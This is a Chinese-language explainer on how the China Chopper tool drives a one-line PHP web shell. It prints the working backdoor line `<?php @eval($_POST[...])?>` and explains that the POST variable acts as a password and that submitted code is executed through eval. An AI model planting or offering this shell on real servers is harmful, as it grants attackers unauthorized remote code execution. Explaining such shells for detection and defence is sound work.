您好,登錄后才能下訂單哦!
對(duì)于玩***的人來說 一句話 中國(guó)菜刀 肯定不陌生 那么菜刀到底是怎么樣判斷他的密碼呢? 如何列目錄的呢? 我們一一來進(jìn)行科普下。
一句話:<?php @eval($_POST[fuck])?>
這是php的一句話密碼。不懂的人來說 這怎么樣是***呢? 這明明是正常的php語法。別著急,慢慢講解。
上面的一句話是服務(wù)端 也就是說 他等待post提交變量名fuck的數(shù)據(jù)
現(xiàn)在是逆向思維 我們先用正向思維去看
<form action="a.php" method="post">
name: <input type="text" name="fuck" />
<input type="submit" />
</form>
www.a.com/a.php
Welcome <?php echo $_POST["fuck"]; ?>.<br />
這個(gè)代碼 你們肯定都熟悉 post提交變量名為fuck的數(shù)據(jù)給a.php 之后輸出
那菜刀就是你先把接受端上傳到服務(wù)器 之后我們自己提交數(shù)據(jù)給接收端
例:<?php @eval($_POST[fuck])?>
那么提交的時(shí)候肯定是post提交數(shù)據(jù) 之后執(zhí)行的相應(yīng)的代碼,比如說列目錄?寫文件?等等 fuck=.......代碼 接收端接受到之后eval執(zhí)行 執(zhí)行之后會(huì)出現(xiàn)相應(yīng)值。那么菜刀再去讀取。
至于密碼這里 我這樣解釋了 相信大家也看的清楚了 為何還有密碼這個(gè)說法。 因?yàn)榻邮斩说膄uck,你輸入123的變量去提交 接受端不認(rèn)識(shí)123變量是什么 那里來的,所以就無法執(zhí)行。
菜刀通訊加密使用base64
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。